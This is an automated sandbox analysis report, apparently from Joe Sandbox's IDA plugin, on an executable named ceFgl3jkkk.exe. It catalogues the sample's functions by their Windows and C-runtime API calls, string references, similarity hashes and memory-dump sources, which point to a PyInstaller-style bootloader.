Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam_free
• String ID: Unhandled exception in script
• API String ID: 4039461714-2699770090
• Opcode ID: f50e41b2b33c4307503ff65714778dd97e952a53c79c8be51e6afa712859c6fd
• Instruction ID: 8a8f955bf7b9ae801b611a4617f04d003c3cf147d6d57f131e030d0f9d71f4fe
• Opcode Fuzzy Hash: f50e41b2b33c4307503ff65714778dd97e952a53c79c8be51e6afa712859c6fd
• Instruction Fuzzy Hash: 81311C71508344ABD724AF64CC4DB9FB7E8BF89705F00092ABB8893252D7789509EB53
APIs
• FreeLibrary.KERNEL32(00000000,?,?,00F5B464,00000000,00000FA0,00F8EFD4,00000000,?,00F5B58F,00000004,InitializeCriticalSectionEx,00F78F9C,InitializeCriticalSectionEx,00000000), ref: 00F5B433
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
• Instruction ID: bfb00436f6f58c1fa964ffd32e11ea06ce6c322b2e68ff0c89c4159eed4c28ea
• Opcode Fuzzy Hash: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
• Instruction Fuzzy Hash: EA11C232E41635ABDB32CF689C49B6D73A4AF01775F250120EE19E7281D770EE05B6D2
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F627FC
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F6280F
• FreeLibrary.KERNEL32(00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F62832
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
• Instruction ID: e653d90eb1f1f895340e8867e863371b1b11f3a331b6608098028bd9cbe03460
• Opcode Fuzzy Hash: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
• Instruction Fuzzy Hash: 92F01C3194161CFBDB129BA0DD0AB9D7B79EB44766F144161E809A21A0CBB18F40FAD6
APIs
• _free.LIBCMT ref: 00F6D74F
• _free.LIBCMT ref: 00F6D91B
• _free.LIBCMT ref: 00F6D993
• GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
Similarity
• API ID: _free$InformationTimeZone
• String ID:
• API String ID: 597776487-0
• Opcode ID: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
• Instruction ID: d825624d30430361a82a9d734e65692aca9072600b93619af88ae2d7305dddf3
• Opcode Fuzzy Hash: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
• Instruction Fuzzy Hash: 26A12472F00219AFDB10AFB4DC42ABE7BB8EF44720F144169E904A7191EB349E45FB91
APIs
• GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F5E887), ref: 00F5E977
• GetFileInformationByHandle.KERNEL32(?,?), ref: 00F5E9D1
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F5E887,?,000000FF,00000000,00000000), ref: 00F5EA5F
• __dosmaperr.LIBCMT ref: 00F5EA66
• PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F5EAA3
  • Part of subcall function 00F5ED82: __dosmaperr.LIBCMT ref: 00F5EDB7
Similarity
• API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 1206951868-0
• Opcode ID: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
• Instruction ID: f01c8a9091c9dd72ccf263a5a549be62fff9529a95c31a63c779c003bd53733b
• Opcode Fuzzy Hash: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
• Instruction Fuzzy Hash: E3416F75900204ABCB28DFB5DC459AFBBF9FF89311B00451DFA56D3211E7389A48EB10
APIs
• EndDialog.USER32(?,00000002), ref: 00F51D8E
• GetWindowLongW.USER32(?,00000008), ref: 00F51DA4
• InvalidateRect.USER32(?,00000000,00000000), ref: 00F51DC3
• SetWindowLongW.USER32(?,00000008,?), ref: 00F51DDE
• EndDialog.USER32(?,?), ref: 00F51E17
Similarity
• API ID: DialogLongWindow$InvalidateRect
• String ID:
• API String ID: 1200242243-0
• Opcode ID: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
• Instruction ID: 72ef2eb52f5dba8eb74be57d405bb46dd8eddc84c8882c28aa4925ad534eed54
• Opcode Fuzzy Hash: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
• Instruction Fuzzy Hash: 5011E0359042147BE6209B14EC0AFAF77A4FB45322F108C15FE85D62D1C6A5FCC5E6A2
APIs
• _free.LIBCMT ref: 00F6A66C
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
• _free.LIBCMT ref: 00F6A67E
• _free.LIBCMT ref: 00F6A690
                                                                                                                      • _free.LIBCMT ref: 00F6A6A2
                                                                                                                      • _free.LIBCMT ref: 00F6A6B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction ID: 8ce288f14cc29528a7c818f92535e100ec2e2837f3179d362b4bb0b382ad8418
                                                                                                                      • Opcode Fuzzy Hash: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction Fuzzy Hash: B4F03032904244AB8660EB68EC86C7A73EDEE407207A94805F018E7521CB75FCC0AFA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F5368D
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D1D
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F536B2
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D46
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533E8
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533F7
                                                                                                                      Strings
                                                                                                                      • SPLASH: Cannot extract requirement %s., xrefs: 00F54CD8
                                                                                                                      • SPLASH: Cannot find requirement %s in archive., xrefs: 00F54D8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncat_strncpy_strrchr
                                                                                                                      • String ID: SPLASH: Cannot extract requirement %s.$SPLASH: Cannot find requirement %s in archive.
                                                                                                                      • API String ID: 4078740465-4094522769
                                                                                                                      • Opcode ID: ae307b57f568946c5deeed348958dd275230ed6068620d6ec8b3b3f4e56f78a0
                                                                                                                      • Instruction ID: 2511db4ecb3df59b33a62026420ee0334ea4d0a9160cdb3665004b1fa753839f
                                                                                                                      • Opcode Fuzzy Hash: ae307b57f568946c5deeed348958dd275230ed6068620d6ec8b3b3f4e56f78a0
                                                                                                                      • Instruction Fuzzy Hash: 0851C472404340ABDB21DF54CC85ADF77ECAF85359F000519FE8997202D775A64DEBA2
                                                                                                                      Strings
                                                                                                                      • Cannot allocate memory for necessary files., xrefs: 00F550E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncpy
                                                                                                                      • String ID: Cannot allocate memory for necessary files.
                                                                                                                      • API String ID: 2961919466-2795144771
                                                                                                                      • Opcode ID: 335ec637f1ff5c98f8143b5c59d524eb9362e5c9af056ce788065d784e96144c
                                                                                                                      • Instruction ID: 3936028c1cdd2d8b150a77e956c7a3298e567c6c718c49ac081f34ed32a26dd4
                                                                                                                      • Opcode Fuzzy Hash: 335ec637f1ff5c98f8143b5c59d524eb9362e5c9af056ce788065d784e96144c
                                                                                                                      • Instruction Fuzzy Hash: 6241D4B2500205ABDB10DE68DC84EA63398BF44316F080975FF0CCB582D775E598A7B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                      • API String ID: 0-2340494698
                                                                                                                      • Opcode ID: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction ID: 769c05011eb38cc9b8a535f25af5ba234d1ecafb8155463702d38078dff943d7
                                                                                                                      • Opcode Fuzzy Hash: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction Fuzzy Hash: 46319171E00218EFCB21DF99CC819EEBBB8FF99310B144166E804E7211D7B59E44EBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID: TMP
                                                                                                                      • API String ID: 269201875-3125297090
                                                                                                                      • Opcode ID: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction ID: fa3d2acf416d4f7a16f8131d253360dda85099e39a6b30d901fd219c02cec381
                                                                                                                      • Opcode Fuzzy Hash: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction Fuzzy Hash: FD21937790420A6E5725AA1A9C83D7F73EDEAC277432D802AFC0A9B741EF74DD017261
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      • Failed to get executable path., xrefs: 00F534D6
                                                                                                                      • Failed to convert executable path to UTF-8., xrefs: 00F53517
                                                                                                                      • GetModuleFileNameW, xrefs: 00F534DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                      • API String ID: 2776309574-1977442011
                                                                                                                      • Opcode ID: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction ID: 4b6baa833ee212b6c71ae0a493299a779dbd1518df30678c6390aaa1cfa8743d
                                                                                                                      • Opcode Fuzzy Hash: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction Fuzzy Hash: 6901DD757143006BF618A7249C8B7EB33C9AF54701F804455BF4DC2182F5AC9A0CE697
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3213747228-0
                                                                                                                      • Opcode ID: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction ID: 623d3f7e87e38a1deec7359d066e732d88ff50c55bf4223ad5eb84214dfbaf4b
                                                                                                                      • Opcode Fuzzy Hash: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction Fuzzy Hash: 90B13772D002859FDB11CF38C851BEEBBF5EF55354F2481AAE845EB242D6399D01EBA0
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F7014E
                                                                                                                      • _free.LIBCMT ref: 00F70177
                                                                                                                      • SetEndOfFile.KERNEL32(00000000,00F6E4B2,00000000,00F68438,?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000), ref: 00F701A9
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000,?,?,?,?,00000000), ref: 00F701C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1547350101-0
                                                                                                                      • Opcode ID: 7139cca7aff077eef02f7aed4396b56b03c4382cfc5e347f77a0116eaec51539
                                                                                                                      • Instruction ID: 13ddb5071b192cfb74f8b1ca9e122d77cae321ad4dff42bc04ff47a7b393d20d
                                                                                                                      • Opcode Fuzzy Hash: 7139cca7aff077eef02f7aed4396b56b03c4382cfc5e347f77a0116eaec51539
                                                                                                                      • Instruction Fuzzy Hash: 8E412832900204EBDB15ABB8DC42B9E37B5EF443B0F644552F91CE72A1DEB8D954B722
APIs
• GetLastError.KERNEL32(?,?,?,00F5C84E,?,?,?,?,00F5C00A,?,?,?), ref: 00F66259
• _free.LIBCMT ref: 00F662B6
• _free.LIBCMT ref: 00F662EC
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00F5C00A,?,?,?), ref: 00F662F7
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: a55ae2014cfa04874ce23825ba001e4a069db79a32f60693468b2ee8f0c8e56c
• Instruction ID: 136cb0932026ed6828fda241b995760918b02c09c823bb6373c1d24061a6b29d
• Opcode Fuzzy Hash: a55ae2014cfa04874ce23825ba001e4a069db79a32f60693468b2ee8f0c8e56c
• Instruction Fuzzy Hash: F11182326046443ADF5137B89CD7E7B3A59DBC1778B340224F924C72E2DEB58D097220
APIs
• GetLastError.KERNEL32(?,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F663B0
• _free.LIBCMT ref: 00F6640D
• _free.LIBCMT ref: 00F66443
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F6644E
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 51225b37bfae98ba5e6780cf1bd25e6a3a60b35b50ec3c0c9486a74a420bf827
• Instruction ID: ad61a686e0009904b778177c8fe733baf8bba1387840896059b781d75bd600b9
• Opcode Fuzzy Hash: 51225b37bfae98ba5e6780cf1bd25e6a3a60b35b50ec3c0c9486a74a420bf827
• Instruction Fuzzy Hash: F711A5326046147AD7117AB5AC87E7B3659DBC1774B240334F528D33E1DEB58C457311
APIs
• GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001), ref: 00F5F1E2
• GetLastError.KERNEL32(?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104), ref: 00F5F1EC
• __dosmaperr.LIBCMT ref: 00F5F1F3
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
• Instruction ID: ac1cbd61f767423f856330e0a65cf455ee27284160f5922c561c3f7546230a5b
• Opcode Fuzzy Hash: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
• Instruction Fuzzy Hash: E9F06D36A00115BBCB202FA2DC08D5AFF69EF457B270445A1FA19C6420D731E969FBD0
APIs
• GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00F5F179
• GetLastError.KERNEL32(?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104,?), ref: 00F5F183
• __dosmaperr.LIBCMT ref: 00F5F18A
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
• Instruction ID: 86f8cb9fd64ca095aeac8cc7ba234300bac01f384a57444d162aadc13a297d2a
• Opcode Fuzzy Hash: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
• Instruction Fuzzy Hash: 88F06932A00915FBCB202BA2DC08D5ABF6AEF443A27154562FA1DC6420D731E968FBD0
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000), ref: 00F6F67E
• GetLastError.KERNEL32(?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000,?,00F65711,?), ref: 00F6F68A
  • Part of subcall function 00F6F650: CloseHandle.KERNEL32(FFFFFFFE,00F6F69A,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000), ref: 00F6F660
• ___initconout.LIBCMT ref: 00F6F69A
  • Part of subcall function 00F6F612: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F6F641,00F6B4FB,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F625
• WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F6AF
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
• Instruction ID: 44d623b026365f8bbcac9ade9d576851d5f63ffecef2259d229fc677b74173b4
• Opcode Fuzzy Hash: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
• Instruction Fuzzy Hash: EAF03937400128BBCF222F95ED099DA7F66FF197A0B404020FA0C96170CB338964BB91
APIs
